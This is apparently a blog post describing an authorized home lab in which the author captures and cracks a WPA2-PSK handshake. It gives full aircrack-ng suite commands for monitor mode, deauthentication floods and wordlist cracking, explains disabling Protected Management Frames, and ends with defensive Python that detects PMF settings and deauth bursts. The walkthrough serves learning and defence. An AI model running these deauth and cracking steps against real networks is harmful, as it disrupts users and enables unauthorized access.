2025-02-20 Hacking your Wi-Fi
=============================

.. post:: Feb 24, 2025
   :tags: Wi-Fi, WPA2-PSK, aircrack-ng, deauth, hacking, security
   :category: Networks, Cybersecurity
   :author: ccli
   :language: en

.. toctree::
   :numbered:

Today I will be practicing WPA2-PSK security and attempting to extract and crack a PSK hash. Let's get started.

.. caution::

   I am not responsible for any malicious, unethical, or destructive behavior done by anyone following this post. I cannot guarantee any of the tools I use are safe. All readers should practice extreme caution when attempting anything written here. You *can* go to jail if you do not act within the proper scope. All of these exercises were done on personal networks that I had authorization to test.

.. note::

   This post took inspiration from the following book: ``Network Basics For Hackers`` by ``OccupytheWeb, Master`` (``2023``).

**Step 1** Setting up
......................

First, we need to install a few tools:

* aircrack-ng

aircrack-ng is one of the most essential tools for any cybersecurity professional. It contains almost everything a hacker needs to monitor and pentest a wireless network. We will also be using ``airmon-ng`` to put the adapter into monitor mode and ``airodump-ng`` to find BSSIDs and capture traffic; both ship with the aircrack-ng suite, so no extra installation is needed.

**Step 2** Compiling
.....................

I simply needed to run:

.. code:: bash

   sudo emerge aircrack-ng

**Step 3** Starting aircrack-ng
...............................

First, we need to figure out what our wireless interface is called. We can run ``ifconfig`` to see that *my* interface is named ``wlan0``.

The next thing we need to do is put our WLAN adapter into monitor mode with the following command:

.. code:: bash

   airmon-ng start wlan0

This deleted our ``wlan0`` interface and replaced it with ``wlan0mon``.

Now let's intercept a handshake to get our PSK (Pre-Shared Key) hash. For the purpose of this lab, I will be connecting my phone to the network I am attacking. Its MAC will be ``22:8F:1B:9A:10:51``; our AP will be ``12:34:56:78:9A:BC``.

First, we need to monitor the network. We can run:

.. code:: bash

   sudo airodump-ng --bssid 12:34:56:78:9A:BC -c 6 -w capture_file wlan0mon

We will get a TUI output like this:

.. code::

    CH  6 ][ Elapsed: 1 min ][ 2025-02-21 11:39

    BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

    12:34:56:78:9A:BC  -41 100      675        0    0   6  360   WPA2 CCMP   PSK  my_network

    BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

    12:34:56:78:9A:BC  22:8F:1B:9A:10:51  -46    0 - 1      0      1863

Let's break down the important fields here.

``Beacons: 675``
   A beacon is the AP's way of telling other devices "I exist, come connect," so we know for sure the AP is up and accepting connections.

We can also see our network uses WPA2-PSK (``WPA2 CCMP PSK``), so we can continue with the attack.

**Step 4** Deauth
..................

While we keep our monitor program running, let's try to deauth my phone. We can run the following command to send deauth packets to my phone's MAC:

.. code:: bash

   sudo aireplay-ng --deauth 500 -a 12:34:56:78:9A:BC -c 22:8F:1B:9A:10:51 -D wlan0mon

If it is successful, we will see an output like this:

.. code::

   11:37:30  Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|13 ACKs]
   11:37:31  Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|22 ACKs]

**Step 5** Coming to terms
...........................

At this point, we realize that our router has Protected Management Frames (PMF) enabled. We can confirm this by filtering in Wireshark: inspect the beacons captured on ``wlan0mon`` and find the RSN/Auth information:

.. code::

   Auth Key Management (AKM) Suite Count: 1
   Auth Key Management (AKM) List 00:1a:2b (IEEE 802.11) PSK

PMF is a security measure that protects unicast and multicast management action frames, which prevents this type of deauthentication attack [1]_.

**BUT** for the sake of this lab, we can disable this and get hacking.

**Step 6** Redemption
......................

Now that I have set up a badly configured router (don't worry, it stays on the LAN only), we can actually proceed with the deauth attack. I will connect my phone to our Wi-Fi network and run the following command:

.. code:: bash

   sudo aireplay-ng --deauth 1000 -a 12:34:56:78:9A:BC wlan0mon

.. note::

   I could pass my phone's MAC (hence the warning); however, this way disconnects every device from the network.

**Step 7** Stealing the password
.................................

After sending our deauth packets, we will monitor our network with ``airodump-ng`` to intercept the 4-way handshake our phone makes after the deauth attack ends. We need to keep sending deauthentication packets until we see ``WPA handshake: XX:XX:XX:XX:XX:XX`` appear in the top right corner of our ``airodump-ng`` interface:

.. code::

   CH  6 | Elapsed: 42 s | 2025-02-22 01:48 | WPA handshake: 12:34:56:78:9A:BC

Once we see this, we can safely kill the attack and the monitor since we have intercepted the PSK hash.

**Step 8** Getting the password
...............................

Now all we have to do is crack the password. For this, we will use ``aircrack-ng``. We will also need a wordlist; I will be using the 10k most common password list for this lab. To begin brute forcing, we will run:

.. code:: bash

   aircrack-ng netgeargetpsk-01.cap -w ../../lists/10kcommon.txt

And in about 2 seconds, we can see the password in cleartext!

.. code::

                                 Aircrack-ng 1.7

   [00:00:00] 8776/10000 keys tested (18813.56 k/s)

   Time left: 0 seconds                                      87.76%

                         KEY FOUND! [ password ]

**Conclusions**
...............

When I first started learning networks, I didn't think I would ever enjoy learning how Wi-Fi worked, but this lab has made me realize wireless networks are one of the most interesting parts of networking. I am considering trying a Bluetooth-based attack next.

Sources
--------

.. [1] https://www.wi-fi.org/knowledge-center/faq/what-are-protected-management-frames
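Looking back at Steps 4 and 5 from the defender's side, here is an added example (my own code, not part of the original lab or of the aircrack-ng suite) that does in Python what the post did by eye in Wireshark and aireplay-ng's output: it reads the RSN Capabilities field of a beacon's RSN information element to tell whether PMF is advertised as capable/required, and it counts deauthentication frames per transmitter so a burst like the 64 "code 7" frames above stands out from normal traffic. The RSN IE bytes and the frames are constructed inline as test input; only the two MAC addresses are taken from the lab.

```python
import struct
from collections import Counter

DEAUTH_SUBTYPE = 0x0C            # 802.11 management subtype 12 = Deauthentication
MFPR_BIT, MFPC_BIT = 0x0040, 0x0080  # RSN Capabilities bit 6 = PMF required, bit 7 = PMF capable


def parse_rsn_mfp(rsn_body: bytes):
    """Walk an RSN IE body (after tag id/length) and return (mfp_capable, mfp_required)."""
    pos = 2 + 4                                          # version (2) + group cipher suite (4)
    n_pairwise = struct.unpack_from("<H", rsn_body, pos)[0]
    pos += 2 + 4 * n_pairwise                            # pairwise cipher suite list
    n_akm = struct.unpack_from("<H", rsn_body, pos)[0]
    pos += 2 + 4 * n_akm                                 # AKM suite list (00:0f:ac:02 = PSK)
    if pos + 2 > len(rsn_body):                          # RSN Capabilities is optional
        return False, False
    caps = struct.unpack_from("<H", rsn_body, pos)[0]
    return bool(caps & MFPC_BIT), bool(caps & MFPR_BIT)


def deauth_counts(frames, threshold: int = 20):
    """Count deauth frames by transmitter (addr2) and return those at or above threshold."""
    counts = Counter()
    for f in frames:
        fc = f[0]
        if (fc >> 2) & 0x3 == 0 and (fc >> 4) & 0xF == DEAUTH_SUBTYPE:
            counts[f[10:16]] += 1                        # addr2: in a flood this is the spoofed AP MAC
    return {src.hex(":"): n for src, n in counts.items() if n >= threshold}


# Constructed RSN IE bodies: WPA2/CCMP/PSK without PMF, and the same with MFPC+MFPR set.
RSN_NO_PMF = bytes.fromhex("0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")
RSN_PMF_REQUIRED = bytes.fromhex("0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "c000")

AP = bytes.fromhex("123456789abc")                       # lab AP BSSID
STA = bytes.fromhex("228f1b9a1051")                      # lab phone


def sample_deauth(src: bytes, dst: bytes, reason: int = 7) -> bytes:
    # Constructed test frame: FC 0xC0, duration, addr1=dst, addr2=src, addr3=bssid, seq, reason code 7
    return b"\xc0\x00\x00\x00" + dst + src + src + b"\x00\x00" + struct.pack("<H", reason)


def sample_beacon(bssid: bytes) -> bytes:
    # Constructed beacon header: FC 0x80, broadcast addr1, addr2=addr3=bssid, seq (body omitted)
    return b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"


# Two beacons plus one burst of 64 directed deauths, matching the aireplay-ng line in the post.
SAMPLE_FRAMES = [sample_beacon(AP)] + [sample_deauth(AP, STA) for _ in range(64)] + [sample_beacon(AP)]
```

With PMF required, a client that supports it discards unprotected deauth frames, which is why the lab had to turn it off in Step 5.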